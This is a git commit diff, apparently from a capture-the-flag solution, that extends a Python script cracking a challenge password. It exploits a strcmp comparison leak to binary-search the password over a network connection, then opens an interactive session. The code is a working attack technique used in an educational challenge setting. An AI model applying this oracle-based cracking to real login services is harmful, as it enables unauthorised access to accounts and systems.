commit 24ca40b1505424367bc65d8ebff4c8675ee83a23
parent b79f41c7bb49de00367b88be90d20dfa6fa7e12f
Author: therealFIGBERT <figbertwelner@gmail.com>
Date: Sat, 12 Oct 2019 11:25:56 -0700
Implementing second stage passcracking
Diffstat:
1 file changed, 22 insertions(+), 3 deletions(-)
diff --git a/third_flag.py b/third_flag.py
@@ -53,7 +53,7 @@ while not cracked:
break
print("Server response:\n{}\n".format(response))
conn.sendline(password)
- print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+ print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
attempt += 1
start_pos = 0
for b in range(len(LO)):
@@ -62,4 +62,23 @@ for b in range(len(LO)):
else:
break
pass_buffer = password[:start_pos]
-pass_end = password[start_pos:]
-\ No newline at end of file
+HI = HI[start_pos:]
+LO = LO[start_pos:]
+first = True
+while not cracked:
+ previous_pass = password
+ if b" -1 " in response:
+ LO = password[start_pos:]
+ password = pass_buffer + passgen(LO, HI)
+ elif b" 1 " in response:
+ HI = password[start_pos:]
+ password = pass_buffer + passgen(LO, HI)
+ else:
+ print("Password cracked as: {}".format(password))
+ cracked = True
+ conn.interactive()
+ conn.sendline(password)
+ print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+ response = conn.recvline_contains(b"strcmp")
+ print("Server response:\n{}\n".format(response))
+ attempt += 1
+\ No newline at end of file
